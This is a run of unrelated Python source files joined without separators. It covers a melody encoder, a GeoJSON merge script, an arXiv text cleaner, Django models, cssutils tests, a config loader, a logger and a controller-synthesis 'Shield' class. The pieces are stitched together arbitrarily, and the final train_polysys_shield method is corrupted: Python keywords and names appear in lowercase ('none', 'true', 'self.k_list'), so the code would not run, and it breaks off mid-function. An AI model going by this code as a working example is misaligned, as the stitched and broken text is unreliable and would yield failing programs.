and <= 11. ' 'transpose_to_key is %d.' 
% transpose_to_key) self.min_note = min_note self.max_note = max_note self.transpose_to_key = transpose_to_key @abc.abstractproperty def input_size(self): """The size of the input vector used by this model. Returns: An int, the length of the list returned by self.melody_to_input. """ pass @abc.abstractproperty def num_classes(self): """The range of labels used by this model. Returns: An int, the range of ints that can be returned by self.melody_to_label. """ pass @abc.abstractmethod def melody_to_input(self, melody): """Returns the input vector for the last event in the melody. Args: melody: A Melody object. Returns: An input vector, a self.input_size length list of floats. """ pass @abc.abstractmethod def melody_to_label(self, melody): """Returns the label for the last event in the melody. Args: melody: A Melody object. Returns: A label, an int in the range [0, self.num_classes). """ pass def encode(self, melody): """Returns a SequenceExample for the given melody. Args: melody: A Melody object. Returns: A tf.train.SequenceExample containing inputs and labels. """ melody.squash(self.min_note, self.max_note, self.transpose_to_key) inputs = [] labels = [] melody_events = melody.events melody.events = melody_events[:1] for i in xrange(1, len(melody_events)): inputs.append(self.melody_to_input(melody)) melody.events = melody_events[:i + 1] labels.append(self.melody_to_label(melody)) return sequence_example_lib.make_sequence_example(inputs, labels) def get_inputs_batch(self, melodies, full_length=False): """Returns an inputs batch for the given melodies. Args: melodies: A list of Melody objects. full_length: If True, the inputs batch will be for the full length of each melody. If False, the inputs batch will only be for the last event of each melody. A full-length inputs batch is used for the first step of extending the melodies, since the rnn cell state needs to be initialized with the priming melody. For subsequent generation steps, only a last-event inputs batch is used. Returns: An inputs batch. If `full_length` is True, the shape will be [len(melodies), len(melodies[0]), INPUT_SIZE]. If `full_length` is False, the shape will be [len(melodies), 1, INPUT_SIZE]. """ inputs_batch = [] for melody in melodies: inputs = [] if full_length and len(melody): melody_events = melody.events for i in xrange(len(melody_events)): melody.events = melody_events[:i + 1] inputs.append(self.melody_to_input(melody)) else: inputs.append(self.melody_to_input(melody)) inputs_batch.append(inputs) return inputs_batch @abc.abstractmethod def class_index_to_melody_event(self, class_index, melody): """Returns the melody event for the given class index. This is the reverse process of the self.melody_to_label method. Args: class_index: An int in the range [0, self.num_classes). melody: A Melody object. This object is not used in this implementation, but see models/lookback_rnn/lookback_rnn_encoder_decoder.py for an example of how this object can be used. Returns: A Melody event value, an int in the range [-2, 127]. -2 = no event, -1 = note-off event, [0, 127] = note-on event for that midi pitch. """ pass def extend_melodies(self, melodies, softmax): """Extends the melodies by sampling from the softmax probabilities. Args: melodies: A list of Melody objects. softmax: A list of softmax probability vectors. The list of softmaxes should be the same length as the list of melodies. 
""" num_classes = len(softmax[0][0]) for i in xrange(len(melodies)): chosen_class = np.random.choice(num_classes, p=softmax[i][-1]) melody_event = self.class_index_to_melody_event(chosen_class, melodies[i]) melodies[i].events.append(melody_event) #This Script is supposed to pull all the coordinates from the second line of every state json file in world.geo.json/countries/USA import os fileToWrite = "C:\\Users\\Sean\\Desktop\\School\\Senior Year\\CMSC 447\\Covid-MapTracker-T3-Site\\Covid-MapTracker-T3.github.io\\US-Counties.js" f2 = open(fileToWrite, 'w') countries = ["AK", "AL", "AR", "AZ", "CA", "CO", "CT", "DC", "DE", "FL", "GA", "HI", "IA", "ID", "IL", "IN", "KS", "KY", "LA", "MA", "MD", "ME", "MI", "MN", "MO", "MS", "MT", "NC", "ND", "NE", "NH", "NJ", "NM", "NV", "NY", "OH", "OK", "OR", "PA", "PR", "RI", "SC", "SD", "TN", "TX", "UT", "VA", "VT", "WA", "WI", "WV", "WY"] length = len(countries) for x in range(length): path = "C:\\Users\\Sean\\Desktop\\School\\Senior Year\\CMSC 447\\Covid-MapTracker-T3-Site\\world.geo.json\\countries\\USA\\" + countries[x] for filename in os.listdir(path): with open(os.path.join(path, filename), 'r') as f: # open in read-only mode f2.write(f.read() + ',') f2.close()sqrl-planner/sqrl-server import pytest def test_true(): assert True import re import os from gensim.parsing.preprocessing import remove_stopwords from joblib import Parallel, delayed, dump, load # import custom process display from util import show_progress import time ####################################################### #################### PATH PARSING ##################### ####################################################### # retrieve my home directory local_file = '../home_directory/home_dir.txt' with open(local_file, 'r') as file: my_home = file.read().rstrip('\r\n') # set RAID 0 array mount path raid_path = my_home + '/mnt/4T_nvme' # set text directory path read_directory = raid_path + '/arxiv_data/raw_text_latest' # astro-ph_latest write_directory = raid_path + '/arxiv_data/clean_text_latest' # clean_astro-ph_latest ######################################################## #################### I/O FUNCTIONS ##################### ######################################################## def read_file(path): """Returns document read in by line""" with open(path, 'r') as f_in: # read in text file doc = f_in.readlines() return doc def write_file(path, new_doc): """Writes new file to specified path""" with open(path, 'w') as f_out: # write new text string to new text file for new_line in new_doc: f_out.write(new_line) ######################################################## #################### TEXT CLEANING ##################### ######################################################## # define ligature mapping to restore words ligatures = {'': 'ff', '': 'fi', '': 'fl', '': 'ffi'} # get hexadecimal codes for ligatures keys = list(ligatures.keys()) # set Regex pattern for additional hexadecimal codes not being replaced hex_string = ' ' pattern = '[' + hex_string + ']' def remove_hex(string): """Returns text string free of hexadecimal coding""" for key in keys: regex = re.compile(key) match_object = regex.findall(string) if len(match_object) != 0: string = string.replace(key, ligatures[key]) string = re.sub(pattern, '', string) return string def keep_alphanumeric(string): """Returns string with only alphanumeric and whitespace type characters""" string = re.sub(r'[^A-Za-z0-9\s]+', '', string) return string def downcase(string): """Returns string with lowercase characters""" string = 
string.lower() return string def no_stopwords(string): """Returns string without stopwords""" string = remove_stopwords(string) return string def no_short_lines(string): """Returns final cleaned string""" if len(string) > 3: # remove whitespace and new line character string = re.sub('\s+', ' ', string) # remove stopwords string = no_stopwords(string) return string def clean_file(path_pair): """Reads in a file, cleans its text, and writes a new file""" # split file path tuple read_path, write_path = path_pair # get next file doc = read_file(read_path) # instantiate text file to return new_doc = [] # iterate through text string for line in doc: # remove hexadecimal codes and restore English words new_string = remove_hex(line) # remove all characters except alphanumeric and whitespace new_string = keep_alphanumeric(new_string) # downcase text new_string = downcase(new_string) # eliminate short lines created by parsing equations, figures, tables, and page numbers if len(new_string) > 3: # remove whitespace and new line character new_string = no_short_lines(new_string) # remove stopwords and add whitespace for end of each line new_string = remove_stopwords(new_string) + ' ' # add filtered string to new string list new_doc.append(new_string) # save new cleaned file write_file(write_path, new_doc) ########################################################## #################### PARALLELIZATION ##################### ########################################################## def make_chunks(paths, chunksize): """Returns path pairs broken into chunks""" chunks = (paths[idx: idx + chunksize] for idx in range(0, len(paths), chunksize)) return chunks def parallel_cleaner(paths): """Runs parallel processed cleaned text""" # instantiate parallel helper executor = Parallel(n_jobs=20, backend='multiprocessing', prefer="processes") # create jobs to distribute execution of test cleaner jobs = delayed(clean_file) # create task chain task_chain = (jobs(chunk) for chunk in paths) # execute parallel jobs executor(task_chain) ######################################################### #################### MAIN EXECUTION ##################### ######################################################### if __name__ == '__main__': # instantiate directories lists files_to_read = [] files_to_write = [] # iterate through directories for dir in sorted(os.listdir(read_directory)): # display directory being cleaned print(dir) # iterate through files from given path files_to_clean = sorted(os.listdir(os.path.join(read_directory, dir))) # set starting number of files to clean for progress display files_left_to_clean = len(files_to_clean) for file in files_to_clean: # display progress show_progress(files_left_to_clean) # set file paths to nested folders read_path = read_directory + '/' + dir + '/' + file write_path = write_directory + '/' + dir + '/' + file # add both file paths to directories lists files_to_read.append(read_path) files_to_write.append(write_path) # update progress display files_left_to_clean += -1 # create chunked path generator paths = list(zip(files_to_read, files_to_write)) chunked_paths = make_chunks(paths, chunksize=1000) start = time.time() # execute parallel text cleaning jobs parallel_cleaner(paths) end = time.time() total_time = end - start print(total_time) from django.db import models from django.contrib.auth.models import User # Create your models here. 
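# A minimal, self-contained sketch of the joblib pattern used by parallel_cleaner() earlier in
# this section (Parallel + delayed over a generator of tasks). The worker function and n_jobs
# value here are illustrative only, not taken from the original cleaning script.
from joblib import Parallel, delayed

def _square(x):
    return x * x

def _parallel_demo():
    executor = Parallel(n_jobs=2, backend='multiprocessing', prefer='processes')
    tasks = (delayed(_square)(i) for i in range(8))
    return executor(tasks)             # results come back in dispatch order: [0, 1, 4, ..., 49]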
class Article(models.Model):
    title = models.CharField(max_length=100)
    slug = models.SlugField()
    body = models.TextField()
    date = models.DateTimeField(auto_now_add=True)
    thumb = models.ImageField(default='default.png', blank=True)
    author = models.ForeignKey(User, on_delete=models.CASCADE, default=None)

    # if you don't write this you will see the object of the article, not its title
    def __str__(self):
        return self.title

    def snippet(self):
        return self.body[:150] + '....'


class Comment(models.Model):
    author = models.ForeignKey(User, on_delete=models.CASCADE, default=None)
    text = models.TextField()
    created_date = models.DateTimeField(auto_now_add=True)
    article = models.ForeignKey(Article, on_delete=models.CASCADE, db_column='slug', default=None)

    def __str__(self):
        return self.text

from .missing_element_base import MissingElementBase


class MissingList(MissingElementBase):
    def __repr__(self):
        if self._key:
            return f"<MissingList key={self._key}>"
        return '<MissingList>'

    def items(self):
        return []

    def optional_string_values(self):
        return []

    def optional_values(self, _loader):
        return []

    def required_string_values(self):
        return []

    def required_values(self, _loader):
        return []

#! /usr/bin/env python
# -*- coding: utf8 -*-
"""
__author__ = 'Yan'
Started by '2019-08-07'
Description: Called whenever a project has been created.
project-created --project --head
"""
from optparse import OptionParser


def main():
    usage = 'project-created --project --head '
    des = 'project-created hooks'
    prog = '%prog'
    version = '1.0.0'
    p = OptionParser(usage=usage, description=des, prog=prog, version=version)
    p.add_option('--project', type=str, help='project')
    p.add_option('--head', type=str, help='head')
    option, args = p.parse_args()
    print(option)


if __name__ == '__main__':
    main()

"""Testcases for cssutils.css.selectorlist.SelectorList."""
import xml.dom
import basetest
import cssutils
from cssutils.css.selectorlist import SelectorList


class SelectorListTestCase(basetest.BaseTestCase):

    def setUp(self):
        self.r = SelectorList()

    def test_init(self):
        "SelectorList.__init__() and .length"
        s = SelectorList()
        self.assertEqual(0, s.length)

        s = SelectorList('a, b')
        self.assertEqual(2, s.length)
        self.assertEqual(u'a, b', s.selectorText)

        s = SelectorList(selectorText='a')
        self.assertEqual(1, s.length)
        self.assertEqual(u'a', s.selectorText)

        s = SelectorList(selectorText=('p|a', {'p': 'uri'}))  # n-dict
        self.assertEqual(1, s.length)
        self.assertEqual(u'p|a', s.selectorText)

        s = SelectorList(selectorText=('p|a', (('p', 'uri'),)))  # n-tuples
        self.assertEqual(1, s.length)
        self.assertEqual(u'p|a', s.selectorText)

    def test_parentRule(self):
        "Selector.parentRule"
        def check(style):
            self.assertEqual(style, style.selectorList.parentRule)
            for sel in style.selectorList:
                self.assertEqual(style.selectorList, sel.parent)

        style = cssutils.css.CSSStyleRule('a, b')
        check(style)

        # add new selector
        style.selectorList.append(cssutils.css.Selector('x'))
        check(style)

        # replace selectorList
        style.selectorList = cssutils.css.SelectorList('x')
        check(style)

        # replace selectorText
        style.selectorText = ('x, y')
        check(style)

    def test_appendSelector(self):
        "SelectorList.appendSelector() and .length"
        s = SelectorList()
        s.appendSelector('a')
        self.assertEqual(1, s.length)

        self.assertRaises(xml.dom.InvalidModificationErr, s.appendSelector, 'b,')
        self.assertEqual(1, s.length)
        self.assertEqual(u'a', s.selectorText)

        s.append('b')
        self.assertEqual(2, s.length)
        self.assertEqual(u'a, b', s.selectorText)

        s.append('a')
        self.assertEqual(2, s.length)
        self.assertEqual(u'b, a', s.selectorText)

        # __setitem__
self.assertRaises(IndexError, s.__setitem__, 4, 'x') s[1] = 'c' self.assertEqual(2, s.length) self.assertEqual(u'b, c', s.selectorText) # TODO: remove duplicates? # s[0] = 'c' # self.assertEqual(1, s.length) # self.assertEqual(u'c', s.selectorText) s = SelectorList() s.appendSelector(('p|a', {'p': 'uri', 'x': 'xxx'})) self.assertEqual(u'p|a', s.selectorText) # x gets lost as not used self.assertRaises(xml.dom.NamespaceErr, s.append, 'x|a') # not set at all self.assertRaises(xml.dom.NamespaceErr, s.append, 'y|a') # but p is retained s.append('p|b') self.assertEqual(u'p|a, p|b', s.selectorText) def test_selectorText(self): "SelectorList.selectorText" s = SelectorList() s.selectorText = u'a, b' self.assertEqual(u'a, b', s.selectorText) self.assertRaises(xml.dom.SyntaxErr, s._setSelectorText, u',') # not changed as invalid! self.assertEqual(u'a, b', s.selectorText) tests = { u'*': None, u'/*1*/*': None, u'/*1*/*, a': None, u'a, b': None, u'a ,b': u'a, b', u'a , b': u'a, b', u'a, b, c': u'a, b, c', u'#a, x#a, .b, x.b': u'#a, x#a, .b, x.b', (u'[p|a], p|*', (('p', 'uri'),)): u'[p|a], p|*', } # do not parse as not complete self.do_equal_r(tests, att='selectorText') tests = { u'x|*': xml.dom.NamespaceErr, u'': xml.dom.SyntaxErr, u' ': xml.dom.SyntaxErr, u',': xml.dom.SyntaxErr, u'a,': xml.dom.SyntaxErr, u',a': xml.dom.SyntaxErr, u'/* 1 */,a': xml.dom.SyntaxErr, } # only set as not complete self.do_raise_r(tests, att='_setSelectorText') def test_reprANDstr(self): "SelectorList.__repr__(), .__str__()" sel=(u'a, p|b', { 'p': 'uri'}) s = cssutils.css.SelectorList(selectorText=sel) self.assertTrue(sel[0] in str(s)) s2 = eval(repr(s)) self.assertTrue(isinstance(s2, s.__class__)) self.assertEqual(sel[0], s2.selectorText) if __name__ == '__main__': import unittest unittest.main() #!/usr/bin/env python3 # -*- coding: utf-8 -*- """This module loads the different configurations""" # Import builtin python libraries import logging import os import sys from pathlib import Path # Import external python libraries import click import yaml # Import custom (local) python packages from . import __package_name__ as package_name from .ios_utils import divider # Source code meta data __author__ = "" __email__ = "" # Config and template path base_locations = [ os.path.join(os.path.expanduser("~"), f".{package_name}"), os.path.join(os.getcwd(), f".{package_name}"), f"/etc/{package_name}", ] config_locations = [os.path.join(base_path, "configs") for base_path in base_locations] base_file_names = ["config"] base_file_extensions = ["yaml", "yml"] file_names = [ file_name + "." 
+ file_extension for file_name in base_file_names for file_extension in base_file_extensions ] config_files = [ os.path.join(config_location, file_name) for config_location in config_locations for file_name in file_names ] # Read configurations def _read_configs(config_file_paths=None): """ This private method reads configurations from a .yml file :param config_file_paths: Configuration files full path (default and custom) """ click.secho(f"[$] Reading configurations.....", fg="blue") for config_file in config_file_paths: with open(config_file, "r") as stream: try: defaults = yaml.load(stream, Loader=yaml.FullLoader) except Exception as err: click.secho(f"ERROR: {err}", fg="red") sys.exit(1) return defaults def load_config(config_file_paths=None): """ This function reads and load the configurations into the system :param config_file_paths: (list) A list of paths for configuration lookup :return: (dict) Merged configurations """ divider("Configurations") if config_file_paths is None: config_file_paths = config_files logging.debug(f"Default lookup paths: {config_files}") # Config finder flag file_flag = 0 permission_flag = 0 for path in config_file_paths: click.secho(f"[*] Searching configs in: [{path}].....", fg="cyan") if os.path.exists(path) and os.path.isfile(path): file_flag = 1 if os.access(path, os.F_OK) and os.access(path, os.R_OK): click.secho(f"[#] Using configs from: [{path}]", fg="green") default_config = path if os.path.exists(default_config) and os.path.isfile(default_config): permission_flag = 1 break else: click.secho(f"[x] Permission ERROR: [{path}]", fg="red") permission_flag = 0 else: file_flag = 0 if file_flag == 1 and permission_flag == 1: # Read configurations all_configs = _read_configs(config_file_paths=[default_config]) else: click.secho(f"[x] Could not locate configuration file!", fg="red") sys.exit(1) base_directory = Path(Path(default_config).parent).parent # Create "common" key at runtime all_configs["common"] = {} all_configs["common"]["base_directory"] = base_directory click.secho(f"[#] Configuration read complete!", fg="green") logging.debug(f"Configs: {all_configs}") return all_configs src/vassal_deployer/logger.py #!/usr/bin/env python """ logger setup """ import sys import logging _LOGGERS = { 'LOGGER': None, 'FILE_HANDLER': None, 'STDOUT_HANDLER': None } STDOUT_FORMATTER = logging.Formatter( "%(asctime)s;%(message)s", datefmt="%Y-%m-%d %H:%M:%S" ) FILE_FORMATTER = logging.Formatter( "%(asctime)s;%(levelname)s;%(message)s", datefmt="%Y-%m-%d %H:%M:%S" ) def get_logger(logfile=None, stdout=True): if _LOGGERS['LOGGER']: return _LOGGERS['LOGGER'] log = logging.getLogger('vassal_deployer') log.setLevel(logging.DEBUG) if stdout and (_LOGGERS['STDOUT_HANDLER'] is None): so_handler = logging.StreamHandler(stream=sys.stdout) so_handler.setLevel(logging.DEBUG) so_handler.setFormatter(STDOUT_FORMATTER) _LOGGERS['STDOUT_HANDLER'] = so_handler if so_handler not in log.handlers: log.addHandler(so_handler) if logfile and (_LOGGERS['FILE_HANDLER'] is None): handler = logging.handlers.WatchedFileHandler(logfile) handler.setLevel(logging.DEBUG) handler.setFormatter(FILE_FORMATTER) _LOGGERS['FILE_HANDLER'] = handler if handler not in log.handlers: log.addHandler(handler) _LOGGERS['LOGGER'] = log return _LOGGERS['LOGGER'] import metrics from metrics import timeit from main import * import scipy.optimize import Environment import os import re import synthesis class Shield(object): """A safe controller for an environment. 
This class represents a disjunctive linear controller for some environment. That is, the controller consists of a list of pairs of polytopes and matrices. To apply the controller at a particular state, we choose a polytope that the state is in and multiply the state by the corresponding matrix. Note that a polytope is represented as a matrix A and a vector b where the polytope includes all points x such that A * x <= b. Attributes: K_list (list of matrices): The linear controllers for this shield. inv_list (list of polytopes): The spaces associated with each controller. """ def __init__(self, env, K_list=None, inv_list=None, cover_list=None, bound=20): """Initialize a new Shield. If K_list and inv_list are given, they are used as the new shield. Otherwise, the new shield is initialized empty and must be trained with train_shield(). Arguments: env (Environment): The environment under control. actor (ActorNetwork): The actor network. Keyword arguments: K_list (list of matrices): The initial controllers. inv_list (list of polytopes): The initial invariants. """ self.env = env self.K_list = [] if K_list is None else K_list self.inv_list = [] if inv_list is None else inv_list self.cover_list = [] if cover_list is None else cover_list if K_list is not None: self.set_covers(bound) self.last_shield = -1 def set_covers(self, bound=20): self.use_list = [] dt = self.env.timestep if self.env.continuous else 0.01 if isinstance(self.env, Environment.PolySysEnvironment): unsafe_space = [] for (A, b) in zip(self.env.unsafe_A, self.env.unsafe_b): unsafe_space.append((A.tolist(), np.asarray(b).flatten().tolist())) if self.env.approx: env = (self.env.breaks, self.env.break_breaks, list(map(lambda x: x.tolist(), self.env.lower_As)), list(map(lambda x: x.tolist(), self.env.lower_Bs)), list(map(lambda x: x.tolist(), self.env.upper_As)), list(map(lambda x: x.tolist(), self.env.upper_Bs)), self.env.continuous, dt, unsafe_space) else: env = (self.env.capsule, self.env.continuous, dt, unsafe_space) else: # unsafe_space format: [(matrix, vector}] if self.env.unsafe_A is not None: unsafe_space = [] for (A, b) in zip(self.env.unsafe_A, self.env.unsafe_b): unsafe_space.append((A.tolist(), np.asarray(b).flatten().tolist())) else: unsafe_space = [] safe_min = self.env.x_min safe_max = self.env.x_max for i in range(len(safe_min)): A1 = [[0.0] * len(safe_min)] A1[0][i] = 1.0 b1 = [safe_min[i]] unsafe_space.append((A1, b1)) A2 = [[0.0] * len(safe_max)] A2[0][i] = -1.0 b2 = [-safe_max[i]] unsafe_space.append((A2, b2)) env = (self.env.A.tolist(), self.env.B.tolist(), self.env.continuous, dt, unsafe_space) covers = [] for inv in self.cover_list: covers.append((inv[0].tolist(), inv[1].flatten().tolist()[0], inv[2].flatten().tolist()[0], inv[3].flatten().tolist()[0])) controllers = [] for k in self.K_list: controllers.append(k.tolist()) ret = synthesis.get_covers(env, controllers, covers, bound) for (A, b) in ret: self.use_list.append((np.matrix(A), np.matrix([[x] for x in b]))) @timeit def train_shield(self, old_shield, actor, bound=20): """Train a shield. This simply invokes the C++ extension, see synthesis.cpp for a more detailed description of the synthesis algorithm. This algorithm requires the old shield to use as a starting point for synthesis. Arguments: old_shield (Shield): The previous shield for this environment. 
""" dt = self.env.timestep if self.env.continuous else 0.01 if isinstance(self.env, Environment.PolySysEnvironment): unsafe_space = [] for (A, b) in zip(self.env.unsafe_A, self.env.unsafe_b): unsafe_space.append((A.tolist(), np.asarray(b).flatten().tolist())) if self.env.approx: env = (self.env.breaks, self.env.break_breaks, list(map(lambda x: x.tolist(), self.env.lower_As)), list(map(lambda x: x.tolist(), self.env.lower_Bs)), list(map(lambda x: x.tolist(), self.env.upper_As)), list(map(lambda x: x.tolist(), self.env.upper_Bs)), self.env.continuous, dt, unsafe_space) else: env = (self.env.capsule, self.env.continuous, dt, unsafe_space) else: # unsafe_space format: [(matrix, vector}] if self.env.unsafe_A is not None: unsafe_space = [] for (A, b) in zip(self.env.unsafe_A, self.env.unsafe_b): unsafe_space.append((A.tolist(), np.asarray(b).flatten().tolist())) else: unsafe_space = [] safe_min = self.env.x_min safe_max = self.env.x_max for i in range(len(safe_min)): A1 = [[0.0] * len(safe_min)] A1[0][i] = 1.0 b1 = [safe_min[i]] unsafe_space.append((A1, b1)) A2 = [[0.0] * len(safe_max)] A2[0][i] = -1.0 b2 = [-safe_max[i]] unsafe_space.append((A2, b2)) env = (self.env.A.tolist(), self.env.B.tolist(), self.env.continuous, dt, unsafe_space) # We need to compute bounding boxes for these polytopes. The # polytopes are represented as a set of linear constraints. In general # we can find the maximum or minimum value for a particular dimension # i by solving a linear optimization problem with objective x_i or # -x_i and the existing constraints. covers = [] for inv in old_shield.cover_list: covers.append((inv[0].tolist(), inv[1].flatten().tolist()[0], inv[2].flatten().tolist()[0], inv[3].flatten().tolist()[0])) controllers = [] for k in old_shield.K_list: controllers.append(k.tolist()) def measure(K, space, dataset): A = np.matrix(space[0]) b = np.matrix([[x] for x in space[1]]) lower = np.matrix([[x] for x in space[2]]) upper = np.matrix([[x] for x in space[3]]) contr = np.matrix(K) grad = np.zeros_like(K) total = 0.0 its = 10 for _ in range(its): # sample an initial state from the cover of this controller iters = 0 while True: x = np.random.random_sample(lower.shape) x = lower + np.multiply(x, upper - lower) if (A * x <= b).all(): break iters += 1 if iters > 200: # This space is very low-density in the region # In this case we will just return some value because # the probability of the state of the system reaching # this space is low return (0.0, 0.0, dataset) #else: # print x # print A * x # print b length = 10 for _ in range(length): u_n = actor.predict(x.transpose()).T u_k = contr * x diff = np.linalg.norm(u_n - u_k) if isinstance(self.env, Environment.Environment): xp = self.env.A * x + self.env.B * u_k else: xp = self.env.polyf(x, u_k) if self.env.continuous: x = x + self.env.timestep * xp else: x = xp total += diff / length grad += (1.0 / length) * (u_k - u_n) * x.T return (((1.0 / its) * grad).tolist(), -total / its, dataset) ret = synthesis.synthesize_shield(env, covers, controllers, bound, measure) self.K_list = [] self.inv_list = [] self.cover_list = [] for (k, (A, b), (sA, sb, l, u)) in ret: self.K_list.append(np.matrix(k)) self.inv_list.append((np.matrix(A), np.matrix([[x] for x in b]))) self.cover_list.append((np.matrix(sA), np.matrix([[x] for x in sb]), np.matrix([[x] for x in l]), np.matrix([[x] for x in u]))) self.set_covers(bound) print("Controllers:") print(self.K_list) print("Invariants:") print(self.inv_list) print("Covers:") print(self.cover_list) def save_shield(self, 
model_path): """Save a shield to a file. Arguments: model_path (string): The path to save this shield to. """ # TODO raise NotImplementedError("save_shield is not yet implemented") def load_shield(self, model_path, enable_jit): """Load a shield previous saved with save_shield(). Arguments: model_path (string): The path to load the shield from. """ # TODO raise NotImplementedError("load_shield is not yet implemented") def detector(self, x, u): """Determine whether an action is unsafe under this shield. Arguments: x (np.matrix): current state u (np.matrix): current action Returns: bool: True if the action is unsafe. """ if isinstance(self.env, Environment.Environment): n = self.env.A * x + self.env.B * u else: n = self.env.polyf(x, u) if self.env.continuous: n = x + self.env.timestep * n for (A, b) in self.inv_list: if (A * n <= b).all(): # We are inside the invariant of some piece of the shield self.last_shield = -1 # print A, b, n, A * n return False #print("Shield called in state:") #print(x) #print("Next state:") #print(n) return True def call_shield(self, x): """Choose an action for a particular state. Arguments: x (np.matrix): The current state Returns: np.array: An for the current state. """ if self.last_shield >= 0: return self.K_list[self.last_shield] * x for i in range(len(self.K_list)): (A, b) = self.inv_list[i] if (A * x <= b).all(): self.last_shield = i return self.K_list[i] * x print(x) for (A, b) in self.inv_list: print(A) print(b) print(A * x) print(A * x <= b) raise RuntimeError("No appropriate controller found in shield invocation") @timeit def train_polysys_shield(self, learning_method, number_of_rollouts, simulation_steps, eq_err=1e-2, explore_mag=0.04, step_size=0.05, names=None, coffset=None, bias=False, degree=4, aggressive=False, without_nn_guide=False, enable_jit=False, nn_weight=0.0): """train shield Args: learning_method (string): learning method string number_of_rollouts (int): number of rollouts simulation_steps (int): simulation steps timestep (float, optional): timestep for continuous control eq_err (float, optional): amount of guassian error rewardf (None, optional): reward function testf (None, optional): reward function for draw controller explore_mag (float, optional): explore mag step_size (float, optional): step size names (None, optional): names of state """ """ Additional arguments in line 2 of the function signature: polyf: describe polynomial system dynamics in python polyf_to_str(K): describe polynomial system dynamics in string rewardf describe polynomial system reward function testf describe polynomial system test function unsafe_string(): describe polynomial unsafe conditions in string """ self.b_str_list = [] self.b_list = [] self.last_b_result = [] self.b = none self.initial_range_list = [] if self.k_list == []: #assert names is not none x0 = self.env.reset() def learning_oracle_continuous(x): self.k = learn_polysys_shield(self.env.polyf, self.env.state_dim, self.env.action_dim, self.env.q, self.env.r, x, eq_err, learning_method, number_of_rollouts, simulation_steps, self.actor, rewardf=self.env.rewardf, continuous=true, timestep=self.env.timestep, explore_mag=explore_mag, step_size=step_size, coffset=coffset, bias=bias, without_nn_guide=without_nn_guide, nn_weight=nn_weight) return self.k def draw_oracle_continuous(x, k): result = test_controller_helper(self.env.polyf, self.k, x, simulation_steps*shield_testing_on_x_ep_len, rewardf=self.env.testf, continuous=true, timestep=self.env.timestep, coffset=coffset, bias=bias) if (result >= 0): # find 
*a new piece of* controller savek(self.model_path, self.k) return result #iteratively search polcies that can cover all initial states def verification_oracle_continuous(x, initial_size, theta, k): #theta and k is useless here but required by the api #specs for initial conditions init = [] initsospoly = [] init_cnstr = [] for i in range(self.env.state_dim): init.append("init" + str(i+1) + " = (x[" + str(i+1) + \ "] - " + str(self.env.s_min[i,0]) + ")*(" + \ str(self.env.s_max[i,0]) + "-x[" + str(i+1) + \ "])") for i in range(self.env.state_dim): initsospoly.append("@variable m zinit" + str(i+1) + \ " sospoly(z)") for i in range(self.env.state_dim): init_cnstr.append(" - zinit" + str(i+1) + "*init" + \ str(i+1)) #specs for initial conditions subject to initial_size for i in range(self.env.state_dim): l = x[i,0] - initial_size[i] h = x[i,0] + initial_size[i] init.append("init" + str(self.env.state_dim+i+1) + \ " = (x[" + str(i+1) + "] - (" + str(l) + \ "))*((" + str(h) + ")-x[" + str(i+1) + "])") for i in range(self.env.state_dim): initsospoly.append("@variable m zinit" + \ str(self.env.state_dim+i+1) + " sospoly(z)") for i in range(self.env.state_dim): init_cnstr.append(" - zinit" + \ str(self.env.state_dim+i+1) + "*init" + \ str(self.env.state_dim+i+1)) #specs for unsafe condions unsafes = self.env.unsafe_property() unsafe = [] unsafesospoly = [] unsafe_cnstr = [] for i in range(len(unsafes)): unsafe.append("unsafe" + str(i+1) + " = " + unsafes[i]) for i in range(len(unsafes)): unsafesospoly.append("@variable m zunsafe" + str(i+1) + \ " sospoly(z)") for i in range(len(unsafes)): unsafe_cnstr.append(" - zunsafe" + str(i+1) + \ "*unsafe" + str(i+1)) #specs for bounded state space bound = [] boundsospoly = [] bound_cnstr = [] if self.env.bound_x_min is not none and \ self.env.bound_x_max is not none: for i in range(self.env.state_dim): if self.env.bound_x_min[i,0] is not none and \ self.env.bound_x_max[i,0] is not none: bound.append("bound" + str(i+1) + " = (x[" + \ str(i+1) + "] - " + \ str(self.env.bound_x_min[i,0]) + ")*(" + \ str(self.env.bound_x_max[i,0]) + "-x[" + \ str(i+1) + "])") for i in range(self.env.state_dim): if self.env.bound_x_min[i,0] is not none and \ self.env.bound_x_max[i,0] is not none: boundsospoly.append("@variable m zbound" + \ str(i+1) + " sospoly(z)") for i in range(self.env.state_dim): if self.env.bound_x_min[i,0] is not none and \ self.env.bound_x_max[i,0] is not none: bound_cnstr.append(" - zbound" + str(i+1) + \ "*bound" + str(i+1)) #specs for bounded environment disturbance disturbance = [] disturbancesospoly = [] disturbance_cnstr = [] if self.env.disturbance_x_min is not none and \ self.env.disturbance_x_max is not none: for i in range(self.env.state_dim): if self.env.disturbance_x_min[i,0] is not none and \ self.env.disturbance_x_max[i,0] is not none: disturbance.append("disturbance" + str(i+1) + \ " = (d[" + str(i+1) + "] - " + \ str(self.env.disturbance_x_min[i,0]) + \ ")*(" + \ str(self.env.disturbance_x_max[i,0]) + \ "-d[" + str(i+1) + "])") for i in range(self.env.state_dim): if self.env.disturbance_x_min[i,0] is not none and \ self.env.disturbance_x_max[i,0] is not none: disturbancesospoly.append( "@variable m zdisturbance" + str(i+1) + \ " sospoly(d)") for i in range(self.env.state_dim): if self.env.disturbance_x_min[i,0] is not none and \ self.env.disturbance_x_max[i,0] is not none: disturbance_cnstr.append(" - zdisturbance" + \ str(i+1) + "*disturbance" + str(i+1)) # now we have init, unsafe and sysdynamics for verification sos = none if 
self.env.bound_x_min is not none and \ self.env.bound_x_max is not none: sos = gensoswithbound(self.env.state_dim, ",".join(self.env.polyf_to_str(k)), "\n".join(init), "\n".join(unsafe), "\n".join(bound), "\n".join(initsospoly), "\n".join(unsafesospoly), "\n".join(boundsospoly), "".join(init_cnstr), "".join(unsafe_cnstr), "".join(bound_cnstr), degree=degree) elif self.env.disturbance_x_min is not none and \ self.env.disturbance_x_max is not none: sos = gensoswithdisturbance(self.env.state_dim, ",".join(self.env.polyf_to_str(k)), "\n".join(init), "\n".join(unsafe), "\n".join(disturbance), "\n".join(initsospoly), "\n".join(unsafesospoly), "\n".join(disturbancesospoly), "".join(init_cnstr), "".join(unsafe_cnstr), "".join(disturbance_cnstr), degree=degree) else: sos = gensos(self.env.state_dim, ",".join(self.env.polyf_to_str(k)), "\n".join(init), "\n".join(unsafe), "\n".join(initsospoly), "\n".join(unsafesospoly), "".join(init_cnstr), "".join(unsafe_cnstr), degree=degree) #verified = verifysos(writesos("sos.jl", sos), false, 900, verified = verifysos(writesos("sos.jl", sos), false, 300, aggressive=aggressive) print(verified) #if verified.split("#")[0].find("optimal") >= 0: if verified.split("#")[0].find("optimal") >= 0: return true, 